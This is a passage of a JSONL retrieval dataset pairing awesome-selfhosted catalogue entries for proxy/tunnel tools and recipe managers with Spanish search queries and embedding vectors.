HTTP(S)/WS(S)/TCP tunnels to localhost using only SSH (serveo/ngrok alternative) [MIT, Go/Docker]. socks5-proxy-server β€” SOCKS5 proxy server with built-in authentication and Telegram-bot for user management and user statistics on data spent (handy when you pay per GB of data). It is dockerised and simple to install [Apache-2.0, Docker]. Squid β€” Caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages [GPL-2.0, C/deb]. Tinyproxy β€” Light-weight HTTP/HTTPS proxy daemon [GPL-2.0, C/deb].", "indexar": "que programa sirve como alternativa a serveo para crear tΓΊneles con SSH?", "v": [0.05876, -0.09457, -0.24319, -0.09835, 0.04878, -0.09605, -0.08626, -0.15789, 0.07555, 0.07196, -0.15276, -0.02935, 0.11551, -0.05666, -0.06171, 0.0614, -0.00648, -0.15286, 0.18754, 0.14103, -0.05241, -0.0086, -0.01898, -0.01862, -0.03967, -0.05665, 0.01648, -0.10392, -0.06599, -0.04231, 0.02543, -0.00621, 0.10104, -0.055, 0.01632, -0.01643, 0.00221, 0.10242, -0.01454, 0.0373, -0.00443, -0.05673, -0.07942, 0.1241, 0.01365, -0.00284, 0.02612, -0.02732, -0.02358, 0.06663, 0.0433, 0.02307, -0.15758, 0.01019, 0.1391, 0.00172, 0.01359, -0.20265, -0.11186, -0.05849, -0.01378, -0.05229, 0.04841, -0.00416, 0.07171, -0.01777, 0.0146, -0.01878, -0.03499, -0.04136, -0.12656, -0.01587, 0.04369, -0.00187, -0.12121, 0.06803, -0.06449, 0.04069, 0.00485, -0.01837, -0.00825, -0.0055, 0.03365, 0.05764, -0.07946, 0.00605, -0.04756, -0.01546, 0.01885, -0.01754, -0.09974, 0.08142, 0.09959, 0.19082, 0.11773, -0.00487, 0.03208, 0.03032, 0.02912, 0.03227, 0.06193, -0.0595, -0.06837, 0.13182, 0.03055, 0.05506, 0.05494, -0.08264, -0.04088, 0.09952, 0.03949, 0.10882, 0.03184, -0.06899, -0.03864, -0.03624, -0.0186, 0.04702, 0.00625, -0.02414, -0.056, 0.01307, -0.08215, -0.01347, 0.00619, 0.01419, 0.00888, 0.03601, 0.01221, 0.13748, -0.01003, 0.02323, -0.00537, -0.03845, -0.04892, -0.05819, 0.06733, 0.0261, 0.06826, -0.01633, 0.06196, 0.02586, 0.02774, -0.08143, -0.02723, -0.03263, -0.00979, -0.14671, 0.02607, 0.00757, -0.00393, -0.04195, -0.04639, 0.02746, -0.05551, -0.07472, -0.00622, 0.01833, -0.08368, 0.14359, 0.00262, -0.01781, 0.02272, -0.03255, 0.0292, -0.05318, -0.03967, -0.03804, 0.03833, 0.01991, -0.05229, 0.05911, 0.07416, -0.04882, 0.03429, -0.03562, 0.00161, -0.0734, 0.05885, 0.02793, -0.03686, -0.11035, -0.02436, 0.13074, 0.00489, -0.12094, 0.00989, -0.01161, 0.03484, 0.00075, -0.05021, -0.01958, -0.01278, -0.03123, -0.04433, -0.01552, 0.07187, -0.04963, 0.05017, -0.04948, -0.08289, 0.0113, 0.02464, -0.02965, -0.01628, 0.02517, -0.02958, -0.00959, 0.07792, 0.11786, 0.06896, -0.06467, 0.00773, 0.01698, 0.02971, 0.02612, 0.01848, 0.03744, 0.03099, 0.03501, -0.00336, -0.05423, -0.04963, 0.07344, -0.04201, -0.03607, 0.01223, 0.03722, -0.04945, -0.01895, 0.00842, -0.05279, -0.0038, 0.01654, 0.01541, -0.01525, -0.03298, 0.01987, 0.03401, -0.04886, -0.01119, 0.02992, 0.00694, 0.03563, -0.02456, 0.0391, -0.00716, -0.00948, -0.01237, 0.00096, -0.00486, 0.04116, -0.0171, 0.00935, 0.06774, 0.06647]} +{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: sish β€” HTTP(S)/WS(S)/TCP tunnels to localhost using only SSH (serveo/ngrok alternative) [MIT, Go/Docker]. socks5-proxy-server β€” SOCKS5 proxy server with built-in authentication and Telegram-bot for user management and user statistics on data spent (handy when you pay per GB of data). It is dockerised and simple to install [Apache-2.0, Docker]. Squid β€” Caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages [GPL-2.0, C/deb]. Tinyproxy β€” Light-weight HTTP/HTTPS proxy daemon [GPL-2.0, C/deb].", "indexar": "con que puedo montar un proxy SOCKS5 sencillo para controlar el uso de datos?", "v": [-0.02293, 0.06831, -0.27083, -0.06754, -0.09911, -0.23347, -0.01499, 0.00518, -0.03917, 0.02728, -0.10771, -0.0562, 0.09634, -0.18482, -0.04372, -0.03871, 0.03258, -0.19663, -0.06951, 0.08352, -0.03697, -0.10131, -0.03357, -0.10883, 0.0601, 0.13506, 0.0671, -0.01726, -0.16514, -0.04003, 0.00645, 0.06462, 0.01864, 0.11048, -0.06304, -0.00919, -0.02154, 0.08113, 0.18447, 0.03652, -0.03714, -0.14913, -0.04207, 0.06441, 0.10444, 0.0195, 0.00263, -0.0838, 0.00789, 0.00572, -0.03217, -0.05523, -0.13327, 0.10518, -0.1088, -0.09422, 0.06552, -0.10122, 0.05073, -0.05001, 0.02108, 0.04024, 0.06885, 0.07727, 0.00283, -0.01965, -0.00284, 0.04138, -0.11477, 0.04369, -0.00742, 0.00673, 0.03308, -0.04204, 0.01501, -0.00733, 0.02827, -0.03088, 0.05793, -0.00622, -0.08084, -0.06521, -0.07434, 0.01543, -0.04845, -0.03042, -0.02949, -0.09871, -0.01795, -0.07063, 0.07251, 0.04759, 0.05164, -0.09078, 0.06233, -0.06378, 0.02356, 0.03568, -0.02967, -0.03953, 0.03601, 0.01994, -0.06412, 0.17656, 0.04153, 0.02419, 0.04047, -0.0766, -0.0608, -0.09173, -0.07007, 0.00693, -0.0364, -0.06123, 0.08417, -0.01784, -0.03561, 0.06469, 0.00219, -0.02186, 0.02458, -0.04157, 0.03583, 0.00299, 0.09653, -0.03293, -0.01979, 0.07195, 0.03157, 0.05683, -0.01418, -0.07249, -0.05885, -0.03637, 0.02128, 0.09135, -0.07341, -0.09016, -0.01378, -0.05156, -0.00176, 0.02146, -0.09571, -0.00192, 0.06991, -0.03415, -0.0086, 0.07115, 0.01234, -0.02644, 0.0718, 0.06804, -0.03139, 0.01005, -0.02812, 0.02394, 0.05153, -0.08467, 0.02839, 0.02096, -0.02944, 0.05279, -0.04927, 0.05586, 0.04278, -0.04745, 0.01568, -0.00791, 0.02408, 0.0765, -0.02716, 0.07057, 0.03548, -0.08804, 0.04622, -0.02483, -0.0272, -0.08649, -0.03754, -0.02753, 0.01671, -0.0164, -0.00453, 0.04352, 0.0176, -0.04166, 0.02192, -0.04976, 0.02396, 0.00427, -0.02284, 0.1439, 0.06255, -0.0374, 0.07208, -0.015, 0.00548, 0.00716, -0.03339, -0.02568, -0.00806, 0.00079, -0.00881, -0.0223, 0.03278, -0.0063, -0.01316, 0.01003, 0.06381, 0.01845, 0.04515, -0.06517, 0.03675, -0.00085, -0.09335, -0.01883, 0.03974, -0.04137, -0.07207, 0.0146, -0.03933, 0.07391, 0.10973, -0.01701, 0.02311, 0.03192, -0.00678, 0.01466, 0.04836, 0.02222, -0.04286, 0.00651, -0.01073, -0.0174, 0.04535, 0.01379, 0.02955, -0.02891, -0.00966, 0.03067, -5e-05, 0.06717, -0.02106, -0.06168, -0.04982, -0.018, -0.069, 0.03385, -0.01726, -0.03527, 0.00038, -0.0051, -0.00442, -0.07541, -0.05258, -0.02671]} +{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: sish β€” HTTP(S)/WS(S)/TCP tunnels to localhost using only SSH (serveo/ngrok alternative) [MIT, Go/Docker]. socks5-proxy-server β€” SOCKS5 proxy server with built-in authentication and Telegram-bot for user management and user statistics on data spent (handy when you pay per GB of data). It is dockerised and simple to install [Apache-2.0, Docker]. Squid β€” Caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages [GPL-2.0, C/deb]. Tinyproxy β€” Light-weight HTTP/HTTPS proxy daemon [GPL-2.0, C/deb].", "indexar": "cual es la mejor herramienta para cachear contenido web y reducir el ancho de banda?", "v": [-0.06687, 0.022, -0.16026, -0.01136, -0.00259, -0.13203, -0.07942, -0.01736, -0.07995, -0.04059, -0.10213, -0.08984, -0.15358, -0.09729, 0.05003, 0.10456, -0.07659, -0.07152, 0.08481, -0.00739, -0.05767, -0.06678, -0.0887, 0.03297, -0.09403, -0.0338, 0.0808, 0.04814, -0.22967, 0.10618, -0.00171, -0.03135, 0.08814, 0.10514, -0.11895, -0.03096, 0.05642, 0.06622, -0.07643, 0.04693, -0.1012, 0.01434, -0.12652, 0.02566, 0.02449, -0.0064, 0.00669, 0.12372, 0.1041, 0.08258, -0.03678, -0.06005, -0.13435, -0.01438, 0.01308, -0.0643, 0.15398, -0.22014, 0.02373, -0.15497, -0.00048, 0.08256, -0.10049, -0.06827, 0.02101, -0.00522, -0.07178, -0.02324, -0.05353, 0.05973, -0.01601, -0.00086, 0.05217, 0.03588, -0.03134, 0.0887, -0.01404, 0.06446, 0.03023, 0.04565, 0.08002, -0.02956, -0.00145, 0.07421, -0.08659, -0.04289, 0.02989, -0.08388, 0.03886, -0.05842, -0.00866, 0.08151, -0.01169, 0.00459, 0.01374, -0.09657, 0.10266, 0.00344, 0.06632, -0.08818, 0.17379, -0.01712, -0.09773, 0.03965, 0.10868, 0.04916, -0.07525, -0.04213, -0.0852, 0.00861, 0.0239, -0.04058, 0.0021, 0.00092, -0.01757, -0.01407, -0.01171, -0.02736, 0.03647, -0.15551, -0.00864, 0.06687, -0.09478, -0.0165, 0.01027, 0.07891, -0.02534, 0.0526, -0.02726, -0.0999, 0.04447, -0.01556, -0.12207, -0.00303, -0.04625, 0.00991, 0.04188, -0.10422, -0.00261, 0.01444, 0.01349, -0.00593, -0.12978, -0.0181, 0.06691, -0.06912, 0.0157, 0.05261, -0.06133, 0.02858, -0.00951, 0.03886, -0.03062, -0.03592, -0.0829, 0.06611, -0.10311, -0.02654, -0.02033, 0.00216, -0.00695, -0.08917, 0.06571, 0.02768, 0.00244, -0.04376, -0.03199, 0.02395, 0.04886, 0.03091, 0.03825, 0.01996, 0.07248, -0.07566, -0.01245, -0.08421, -0.06754, -0.03874, 0.03479, -0.01365, 0.02699, -0.05246, -0.01981, 0.0211, 0.00828, -0.05141, 0.06753, -0.00063, 0.00364, 0.00137, -0.00409, 0.03833, 0.01875, -0.00609, 0.02314, -0.03853, -0.06259, -0.06142, 0.0924, 0.02484, -0.03121, -0.07736, -0.00438, -0.04618, 0.00866, 0.04017, -0.009, -0.09511, -0.0099, 0.00563, 0.01307, -0.00504, -0.03173, -0.03836, 0.00622, 0.03951, 0.03479, 0.0343, -0.06527, 0.05107, 0.03427, 0.05215, 0.08868, 0.02252, -0.04755, 0.00978, 0.01117, 0.01797, -0.00519, -0.05755, -0.00728, -0.02311, -0.01192, -0.02253, 0.01173, -0.02596, 0.03688, -0.04761, -0.04107, -0.0395, -0.02699, 0.04578, 0.00351, 0.0059, -0.01023, -0.00239, -0.05048, 0.00551, -0.06228, -0.08576, -0.04103, 0.00379, 0.02854, -0.03524, 0.03787, -0.00596]} +{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Bar Assistant β€” Manage your home bar while adding your ingredients, searching for cocktails and creating custom cocktail recipes [MIT, PHP/Docker]. CookCLI β€” Command-line tool for automating meal planning and shopping with Cooklang recipes, scriptable for UNIX workflows, includes web server [MIT, Rust]. Fork Recipes β€” Manage your food recipes with simplicity [BSD-3-Clause, Docker]. ManageMeals β€” Manage recipes, import recipes by URL and organize them without any ads or unnecessary text [GPL-3.0, Docker]. Mealie β€” Material design inspired recipe manager with category and tag management, shopping-lists, meal-planner, and site customizations. Mealie is focused on simple user interactions to keep the whole family using the app [MIT, Python]. RecipeSage β€” A recipe keeper, meal plan organizer, and shopping list manager that can import recipes directly from any URL [AGPL-3.0, Nodejs]. Recipya β€” Clean, simple and powerful recipe manager your whole family will enjoy [GPL-3.0, Docker/Go].", "indexar": "que programa sirve para gestionar mis recetas y crear listas de compra en casa?", "v": [0.05868, 0.07406, -0.07637, -0.21878, 0.06271, -0.18491, -0.00176, 0.00742, -0.14196, -0.20606, -0.08625, -0.15956, 0.05651, -0.11426, 0.02987, 0.01006, 0.1103, -0.06714, 0.08423, 0.07863, -0.00309, 0.05058, 0.00193, -0.06526, -0.17641, -0.05449, 0.16787, -0.07347, -0.11671, 0.17703, 0.02127, -0.02547, -0.00709, -0.15572, 0.02634, 0.01745, 0.0437, -0.08009, -0.0203, 0.04935, 0.01323, 0.09987, -0.03676, 0.02391, -0.02266, -0.03027, 0.1804, -0.02606, -0.03838, 0.0338, -0.0532, -0.04063, -0.03566, 0.07266, 0.10153, -0.05525, -0.06301, -0.20169, 0.00988, 0.00564, -0.11443, -0.08383, 0.0798, 0.04, -0.02027, -0.01333, -0.02357, 0.0071, 0.02323, -0.01582, -0.09625, 0.07259, 0.03064, -0.04954, -0.02899, -0.03837, 0.03466, -0.01069, -0.00618, -0.07366, 0.02758, -0.07918, -0.07982, -0.0069, 0.04673, -0.06161, 0.00236, -0.03769, -0.01131, -0.0801, -0.02608, -0.04886, -0.00528, 0.00766, 0.12955, -0.00803, 0.15423, 0.0362, 0.02443, 0.09093, -0.0119, -0.06229, -0.08545, 0.14528, -0.07205, 0.07974, 0.07437, 0.02713, -0.09543, -0.01937, -0.07595, 0.02796, -0.0694, 0.01813, -0.00835, 0.0484, -0.0363, 0.00761, 0.03067, 0.00561, -0.11789, 0.02142, -0.02466, 0.0079, 0.01743, -0.00714, 0.07046, 0.04236, -0.05464, 0.0963, -0.04, 0.02001, 0.02871, -0.01348, -0.00721, -0.06709, -0.05396, -0.00182, -0.04396, -0.12987, -0.01107, 0.09483, -0.00017, -0.02279, 0.02522, -0.03875, 0.00308, -0.02711, 0.01473, 0.0836, -0.00833, 0.00662, -0.01628, 0.03758, 0.00541, -0.01406, -0.00459, -0.05049, -0.07888, 0.01823, -0.04652, 0.0892, -0.04773, -0.04739, -0.00124, 0.00556, 0.00312, 0.09657, 0.02283, 0.07165, -0.0183, 0.08121, 0.02473, -0.05094, -0.0146, -0.06107, 0.03255, -0.07997, -0.0168, 0.01899, -0.07846, 0.00947, 0.0428, 0.03601, -0.00143, 0.00694, -0.03325, 0.08321, -0.02979, -0.00345, -0.1215, -0.03936, -0.04728, 0.02639, 0.02172, 0.00437, -0.00524, 0.03071, 0.02241, -0.05623, -0.05688, -0.04175, 0.06512, 0.03147, 0.00385, 0.05553, -0.02771, 0.00225, 0.08509, 0.07036, 0.00806, -0.01793, 0.01781, 0.03593, -0.02413, -0.0325, -0.04342, -0.00918, 0.07515, 0.05009, 0.03817, -0.00441, -0.05195, 0.00897, 0.00672, -0.01047, 0.0292, -0.03284, 0.02797, 0.0376, -0.01582, -0.06386, 0.06995, 0.00531, 0.00351, -0.06572, 0.01512, -0.0216, 0.00226, -0.00944, -0.03258, 0.06702, 0.0206, -0.01976, -0.00566, 0.0, -0.02597, 0.00469, 0.01274, -0.0231, -0.0475, -0.0153, 0.02413, 0.00966, 0.05555, 0.01478]} +{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Bar Assistant β€” Manage your home bar while adding your ingredients, searching for cocktails and creating custom cocktail recipes [MIT, PHP/Docker]. CookCLI β€” Command-line tool for automating meal planning and shopping with Cooklang recipes, scriptable for UNIX workflows, includes web server [MIT, Rust]. Fork Recipes β€” Manage your food recipes with simplicity [BSD-3-Clause, Docker]. ManageMeals β€” Manage recipes, import recipes by URL and organize them without any ads or unnecessary text [GPL-3.0, Docker]. Mealie β€” Material design inspired recipe manager with category and tag management, shopping-lists, meal-planner, and site customizations. Mealie is focused on simple user interactions to keep the whole family using the app [MIT, Python]. RecipeSage β€” A recipe keeper, meal plan organizer, and shopping list manager that can import recipes directly from any URL [AGPL-3.0, Nodejs]. Recipya β€” Clean, simple and powerful recipe manager your whole family will enjoy [GPL-3.0, Docker/Go].", "indexar": "con que puedo organizar las recetas de la familia sin anuncios ni texto innecesario?", "v": [0.03948, 0.12693, -0.02782, -0.06464, 0.07939, -0.07483, 0.01686, -0.04352, -0.11393, -0.06467, -0.11724, -0.0918, 0.03021, -0.10771, 0.10001, 0.06573, 0.18699, 0.08449, 0.09825, 0.01505, -0.04239, -0.04675, -0.09307, 0.08937, -0.06148, -0.17487, 0.14021, -0.02056, -0.15188, 0.02076, -0.10971, 0.00578, 0.10089, -0.07534, -0.02363, 0.09685, -0.05826, 0.02592, -0.14882, -0.00668, -0.04531, 0.12874, -0.158, 0.05698, -0.11096, -0.06043, 0.03499, 0.00864, -0.05327, -0.07016, -0.02465, -0.14392, 0.0695, 0.06893, -0.14021, -0.01433, 0.06007, -0.03002, 0.00605, 0.06165, 0.04513, -0.00365, 0.05793, 0.08005, -0.05676, 0.12281, -0.04592, 0.09164, 0.08298, -0.03685, -0.07098, 0.01982, 0.02733, -0.03963, -0.03889, 0.08289, -0.00715, 0.00996, 0.04784, 0.06148, -0.03557, 0.01281, -0.01098, 0.08454, 0.08046, -0.05519, -0.00762, -0.01329, 0.07519, -0.09498, 0.06621, -0.07343, 0.02093, -0.03315, 0.01176, 0.01852, 0.1206, 0.00555, 0.02564, 0.13792, 0.02406, -0.12449, -0.0987, 0.07347, -0.04862, -0.0189, 0.06739, 0.00266, -0.00069, -0.08556, -0.07665, 0.0044, 0.01401, 0.00356, 0.00985, 0.04613, 0.00379, 0.03162, 0.00213, -0.06271, -0.04931, 0.02024, 0.07502, 0.05041, -0.01078, -0.01218, 0.053, 0.08313, -0.04247, 0.0937, 0.00992, -0.02965, -0.01445, -0.09232, 0.01254, -0.01604, -0.07614, 0.00478, -0.01323, -0.0977, -0.01483, -0.02441, -0.06225, -0.11513, 0.03011, 0.04592, -0.01923, -0.00311, 0.00375, -0.01276, -0.07202, 0.00657, 0.06424, 0.0688, 0.07256, 0.03698, -0.01432, -0.04946, -0.00363, -0.01708, -0.07249, 0.0119, -0.08458, -0.03976, 0.00701, 0.01578, -0.01691, -0.02739, -0.06818, -0.05476, -0.07107, 0.01433, 0.00107, -0.0482, 0.06237, -0.03392, -0.02545, -0.00441, -0.03994, 0.05601, -0.02535, 0.02352, -0.10947, 0.04884, -0.00192, 0.02192, 0.05916, 0.04725, -0.02485, -0.03933, -0.03516, -0.02266, -0.03283, 0.02012, 0.00024, -0.01736, -0.08522, -0.0592, 0.04308, 0.00112, -0.00745, -0.0756, 0.0209, -0.005, 0.02722, 0.02454, -0.01938, 0.04765, -0.0088, 0.12082, 0.08282, -0.01379, -0.02253, 0.01656, -0.11398, 0.04362, -0.02634, -0.05387, 0.08896, 0.11065, 0.07872, 0.09056, -0.00097, -0.09375, 0.01261, -0.07136, -0.00245, -0.06415, 0.04598, 0.01524, -0.00553, -0.03624, 0.03325, 0.05461, -0.03511, 0.02171, -0.03775, -0.08851, 0.04115, 0.03884, -0.00859, -0.02348, 0.00633, 0.01302, -0.07453, -0.07876, -0.02823, 0.0475, -0.00324, -0.02505, 0.01319, 0.01364, 0.03121, -0.11595, 0.02503, -0.0274]} +{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Bar Assistant β€” Manage your home bar while adding your ingredients, searching for cocktails and creating custom cocktail recipes [MIT, PHP/Docker]. CookCLI β€” Command-line tool for automating meal planning and shopping with Cooklang recipes, scriptable for UNIX workflows, includes web server [MIT, Rust]. Fork Recipes β€” Manage your food recipes with simplicity [BSD-3-Clause, Docker]. ManageMeals β€” Manage recipes, import recipes by URL and organize them without any ads or unnecessary text [GPL-3.0, Docker]. Mealie β€” Material design inspired recipe manager with category and tag management, shopping-lists, meal-planner, and site customizations. Mealie is focused on simple user interactions to keep the whole family using the app [MIT, Python]. RecipeSage β€” A recipe keeper, meal plan organizer, and shopping list manager that can import recipes directly from any URL [AGPL-3.0, Nodejs]. Recipya β€” Clean, simple and powerful recipe manager your whole family will enjoy [GPL-3.0, Docker/Go].", "indexar": "cual es una alternativa libre a los gestores de recetas tradicionales para administrar mis platos favoritos?", "v": [0.30573, 0.02225, -0.03318, -0.05667, 0.02673, 0.10484, 0.18242, -0.10851, -0.17326, -0.07201, 0.02804, -0.00257, 0.05726, -0.0021, 0.14465, -0.0034, 0.12866, 0.00769, 0.12397, 0.0062, -0.06542, -0.01612, -0.02627, -0.06367, -0.11523, -0.1149, 0.12686, -0.03581, -0.10956, 0.10343, -0.00015, 0.01639, -0.02526, -0.11249, 0.00535, 0.00391, -0.00434, -0.01127, -0.09711, -0.03873, 0.04023, -0.03931, -0.0248, 0.01134, -0.00481, -0.09391, 0.00186, -0.06069, 0.02111, 0.02369, -0.04515, -0.09633, 0.01496, 0.05348, 0.00764, -0.00354, 0.08247, -0.03158, -0.0759, 0.05436, -0.04351, -0.01721, 0.08946, 0.08254, -0.01017, 0.01716, -0.00346, -0.01768, -0.00633, 0.06748, 0.03188, 0.11656, 0.03064, 0.01695, -0.08034, 0.12506, 0.05781, 0.10966, 0.02827, -0.02779, 0.03007, -0.07757, 0.02939, 0.04913, -0.06315, -0.10034, 0.05411, -0.17302, -0.06706, 0.00273, 0.01549, -0.10069, 0.03741, 0.02271, 0.00606, -0.00092, 0.03858, 0.11916, -0.03335, 0.21208, 0.08144, 0.08421, -0.12102, 0.09703, 6e-05, 0.02869, 0.08551, -0.04872, -0.00816, 0.01964, -0.04906, 0.03313, 0.01457, 0.05622, 0.04179, 0.05085, -0.08236, 0.02217, -0.02219, -0.01863, -0.09214, -0.01478, -0.0264, -0.01352, 0.06042, 0.03501, 0.03328, 0.08182, 0.00339, 0.05949, -0.01513, 0.02837, 0.00984, -0.00677, -0.08427, 0.05544, 0.08503, 0.01832, -0.0062, -0.09527, -0.06755, 0.03047, 0.01202, -0.07328, 0.06237, -0.04992, 0.05378, -0.04081, -0.0287, -0.03029, -0.10123, -0.01038, -0.02459, 0.10467, -0.06897, 0.02181, -0.07625, -0.0723, -0.11166, 0.10876, 0.06009, -0.01656, -0.00706, 0.01277, -0.08544, -0.02815, -0.02266, -0.00633, 0.02987, 0.01626, 0.00282, 0.07805, 0.00622, -0.02541, 0.02681, -0.07165, -0.02526, -0.1033, 0.11399, 0.04989, -0.01663, 0.01546, -0.0859, 0.06111, 0.0028, -0.06511, 0.00451, 0.09485, 0.0344, 0.05965, 0.0575, 0.00012, -0.06941, -0.08716, -0.02753, 0.0779, 0.01494, 0.01119, -0.06975, 0.00843, 0.01414, -0.04052, -0.04884, -0.0254, -0.00921, 0.04482, -0.0647, 0.03547, 0.00566, 0.08592, 0.03871, 0.01563, 0.08124, -0.0117, -0.03123, -0.01098, -0.03141, -0.0398, 0.04329, -0.03686, 0.01302, -0.00992, 0.03177, -0.02686, 0.01753, 0.01153, 0.00412, 0.02523, -0.03651, -0.00297, -0.00707, -0.02975, -0.02642, 0.0505, 0.00521, -0.00227, 0.0065, -0.06016, -0.04212, -0.00225, -0.00925, 0.07118, -0.02127, -0.03013, -0.00244, -0.01263, -0.08815, -0.02442, -0.05489, -0.01476, -0.01586, 0.01532, 0.0135, 0.00266, 0.01509, -0.05911]} +{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Tamari β€” Recipe manager web app with a built-in collection of recipes. Organize by favorites and categories, create shopping lists, and plan meals [GPL-3.0, Docker/Python]. Vanilla Cookbook β€” Recipe manager designed with complexity under the hood, keeping the user experience as uncluttered, simply vanilla as possible [GPL-3.0, Docker/Nodejs]. What To Cook? β€” Get a recipe to cook today, based on the ingredients you have at home [AGPL-3.0, Docker].", "indexar": "que programa puedo usar para gestionar mis recetas y hacer listas de la compra", "v": [0.05275, 0.12535, -0.12853, -0.23536, 0.07184, -0.10557, -0.00584, -0.00994, -0.22925, -0.19061, -0.09886, -0.12847, 0.0431, -0.04298, -0.01404, 0.0031, 0.08793, -0.05904, 0.05921, 0.03712, 0.02196, -0.01299, -0.04889, -0.07797, -0.15802, 0.03905, 0.15095, -0.09821, -0.11282, 0.08594, -0.0445, -0.01039, 0.01209, -0.18166, -0.00191, 0.021, 0.04563, -0.07378, 0.05412, 0.04312, -0.01761, 0.09165, -0.08197, -0.02457, 0.02679, 0.0021, 0.13688, -0.05695, -0.05235, 0.01428, -0.00929, -0.05837, -0.04943, 0.04035, 0.0953, -0.08868, -0.03159, -0.15819, -0.04006, -0.01992, -0.06581, -0.07619, 0.05537, 0.08662, -0.0324, -0.00026, 0.00397, 0.00247, -0.05722, 0.04495, -0.06317, 0.10725, 0.03424, -0.02273, -0.01584, -0.00671, 0.04907, 0.00949, 0.04255, -0.04249, -0.03179, -0.06308, -0.0022, 0.03445, -0.02923, -0.08418, 0.04624, -0.05181, -0.02205, -0.05991, -0.0427, -0.04961, -0.03468, -0.07701, 0.14128, -0.01397, 0.0675, 0.06825, 0.00846, 0.1076, 0.04206, -0.02717, -0.07225, 0.13961, -0.08435, 0.04918, 0.07531, 0.00738, -0.0669, -0.02211, -0.10547, -0.02653, -0.1229, -0.01212, -0.0589, 0.06606, -0.01991, -0.01278, -0.00288, -0.01585, -0.09847, 0.02147, -0.03475, -0.01205, 0.17957, 0.03162, 0.02663, 0.11977, -0.08307, 0.05595, -0.03577, 0.05708, 0.03563, -0.07991, -0.05014, -0.09327, -0.04514, -0.00917, -0.00619, -0.09802, -0.05532, 0.05529, -0.03295, 0.01936, 0.04531, -0.0573, -0.00647, -0.05837, 0.03009, 0.02918, 0.0704, -0.03405, 0.00327, 0.06446, 0.02133, -0.02313, 0.06056, -0.06195, -0.06392, 0.01436, -0.05635, 0.04912, -0.03742, 0.00753, 0.06512, -0.0435, 0.00377, 0.07137, -0.00235, 0.07021, 0.0373, 0.10845, 0.04855, -0.04641, 0.03388, -0.07234, 0.00439, -0.06742, 0.02197, 0.02869, -0.06307, 0.01826, 0.05992, 0.0353, 0.02177, 0.01335, -0.03019, 0.0767, -0.03029, 0.04532, -0.08298, 0.0181, 0.0088, 0.01878, 0.05284, 0.02968, 0.0329, 0.07689, -0.03907, -0.07439, -0.04762, -0.01088, 0.01323, -0.0293, 0.03284, 0.0371, -0.0723, 0.02254, 0.09287, 0.06774, 0.03421, -0.02631, 0.03235, 0.00728, -0.04331, -0.04642, -0.06368, 0.01126, 0.03564, -0.00456, 0.01509, 0.0234, -0.00155, 0.06284, 0.00083, -0.02399, 0.03568, -0.0064, 0.00479, 0.05062, -0.02346, -0.00692, 0.03233, -0.03348, 0.00238, -0.04961, 0.00197, -0.02348, -0.02394, -0.01351, -0.02137, 0.08827, 0.0277, -0.02004, -0.02745, 0.01807, -0.06125, 0.00649, -0.00283, -0.03276, -0.02457, -0.00754, 0.04787, -0.02036, 0.04595, 0.01269]} +{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Tamari β€” Recipe manager web app with a built-in collection of recipes. Organize by favorites and categories, create shopping lists, and plan meals [GPL-3.0, Docker/Python]. Vanilla Cookbook β€” Recipe manager designed with complexity under the hood, keeping the user experience as uncluttered, simply vanilla as possible [GPL-3.0, Docker/Nodejs]. What To Cook? β€” Get a recipe to cook today, based on the ingredients you have at home [AGPL-3.0, Docker].", "indexar": "con que herramienta puedo planificar mi menΓΊ semanal automΓ‘ticamente", "v": [0.17885, 0.16196, -0.1358, -0.16889, 0.02853, -0.04163, -0.0737, -0.041, -0.1736, -0.17267, -0.07353, 0.01102, 0.0662, -0.08502, -0.02216, 0.13372, 0.08532, -0.11936, 0.08212, 0.07734, 0.00413, -0.01609, -0.16394, 0.0366, -0.08756, -0.08525, 0.14034, 0.03103, -0.21359, -0.01815, -0.01096, 0.07287, 0.03602, -0.08679, -0.0484, 0.01041, 0.04143, 0.17676, -0.07885, -0.095, -0.04018, 0.07133, -0.09775, 0.06006, 0.02824, 0.01972, 0.01254, -0.05323, -0.0092, 0.03782, -0.00063, -0.06967, -0.01918, 0.05061, 0.01332, -0.03738, 0.22806, -0.11884, 0.02752, -0.04645, 0.00063, 0.01493, 0.01028, 0.0776, 0.03501, 0.04655, 0.0412, -0.02871, 0.02449, 0.06803, -0.0585, -0.02039, 0.02257, -0.01999, 0.05673, 0.01202, 0.11528, 0.09409, 0.09904, -0.01263, -0.02056, -0.04892, 0.03246, 0.09707, -0.10188, -0.09257, -0.01547, -0.08364, 